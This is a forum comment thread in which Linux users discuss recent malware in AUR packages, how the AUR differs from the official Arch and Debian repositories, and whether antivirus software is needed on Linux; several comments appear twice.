Isn’t Arch repo a little bit faster to accept packages? From what I understood the point was to make it easier to maintain a package therefore you have the most up to date software version, not sure if this was the problem or anything else, but I have doubt that Debian repositories could be poisoned like this
The Arch repos are completely different from the AUR. The Arch repos are officially maintained and tested. The AUR is where anyone can go upload a little pkgbuild script to make building and installing an arbitrary package as easy as possible.
Arch’s package manager (pacman) does not work with the AUR. The AUR is basically a glorified pastebin. It’s a convenience for people who know what they’re doing, but you should not go downloading and executing files at random from there. Arch explicitly warns against doing this, and deliberately does not ship with any easy way to do this.
Just in case you didn’t circle back, the other commenter is correct. Just like Debian repositories, Arch repositories also haven’t been poisoned like this . AUR has recently, but that’s equivalent of like on Debian adding 3rd party repos, but AUR is just a meta collection of those unofficial user repos basically. Arch documentation even warns against blindly installing from AUR, and to read the pkg build first since it’s basically the same thing as copy and pasting a curl command from a GitHub repo’s readme.
I’ve been using Linux for more than 25 years and never had an antivirus. I’m also trying to just keep to official repos. From what I’ve seen over the years it’s not viruses or malware that are the most dangerous on Linux, but vulnerabilities found in some software, that usually only requires you to update your system.
Maybe I’d be more careful if I was installing obscure packages from weird places, but I’m about as conservative as Debian when it comes to new software and bleeding edge, so usually the stuff that I install has been tried and tried again.
also: antivirus detection, you guys have antivirus? I just install things from the official repository
Well, recently there have been attacks on Arch based distros via poisened AUR packages.
Isn’t Arch repo a little bit faster to accept packages? From what I understood the point was to make it easier to maintain a package therefore you have the most up to date software version, not sure if this was the problem or anything else, but I have doubt that Debian repositories could be poisoned like this
The Arch repos are completely different from the AUR. The Arch repos are officially maintained and tested. The AUR is where anyone can go upload a little pkgbuild script to make building and installing an arbitrary package as easy as possible.
Arch’s package manager (pacman) does not work with the AUR. The AUR is basically a glorified pastebin. It’s a convenience for people who know what they’re doing, but you should not go downloading and executing files at random from there. Arch explicitly warns against doing this, and deliberately does not ship with any easy way to do this.
Just in case you didn’t circle back, the other commenter is correct. Just like Debian repositories, Arch repositories also haven’t been poisoned like this . AUR has recently, but that’s equivalent of like on Debian adding 3rd party repos, but AUR is just a meta collection of those unofficial user repos basically. Arch documentation even warns against blindly installing from AUR, and to read the pkg build first since it’s basically the same thing as copy and pasting a curl command from a GitHub repo’s readme.
AUR is not an official repository by the distro and malware in user repos is nothing new
I’ve been using Linux for more than 25 years and never had an antivirus. I’m also trying to just keep to official repos. From what I’ve seen over the years it’s not viruses or malware that are the most dangerous on Linux, but vulnerabilities found in some software, that usually only requires you to update your system.
Maybe I’d be more careful if I was installing obscure packages from weird places, but I’m about as conservative as Debian when it comes to new software and bleeding edge, so usually the stuff that I install has been tried and tried again.